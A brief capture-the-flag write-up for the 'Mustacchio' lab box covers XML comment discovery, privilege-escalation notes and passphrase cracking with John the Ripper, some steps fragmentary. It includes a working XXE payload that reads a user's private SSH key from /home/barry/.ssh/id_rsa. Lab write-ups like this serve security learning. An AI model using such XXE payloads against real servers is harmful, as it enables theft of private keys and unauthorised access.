Mustacchio
Mustacchio
Mustacchio
🔍 XXE Exploitation
🕵️ I didn’t have many ideas at this point, but I found some XML comments:
1
2
3
4
5
6
<?xml version="1.0" encoding="UTF-8"?>
<comment>
<name>Joe Hamd</name>
<author>Barry Clad</author>
<com>his paragraph was a waste of time and space. If you had not read this and I had not typed this you and I could’ve done something more productive than reading this mindlessly and carelessly as if you did not have anything else to do in life. Life is so precious because it is short and you are being so careless that you do not realize it until now since this void paragraph mentions that you are doing something so mindless, so stupid, so careless that you realize that you are not using your time wisely. You could’ve been playing with your dog, or eating your cat, but no. You want to read this barren paragraph and expect something marvelous and terrific at the end. But since you still do not realize that you are wasting precious time, you still continue to read the null paragraph. If you had not noticed, you have wasted an estimated time of 20 seconds.</com>
</comment>
💻 I needed to find the SSH key. I checked for backup files but found nothing useful. 
💡 XML External Entity (XXE) injection worked. The next step was to find the path to the SSH key, so I tried common paths:
1
2
3
4
5
6
7
8
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///home/barry/.ssh/id_rsa" >]>
<foo>
<name>&xxe;</name>
<email>test@test.com</email>
<message>test</message>
</foo>
🕵️ Hash Cracking
📌 It worked! Next, I tried to log in via SSH, but it asked for a passphrase. I tried some guesses but ended up cracking it. First, I converted the key to a hash format for John the Ripper:
It worked!

⚡ Privilege Escalation
And searched for information about the Live Nginx Log Reader:
1
tail -f /var/log/nginx/access.log
This post is licensed under CC BY 4.0 by the author.










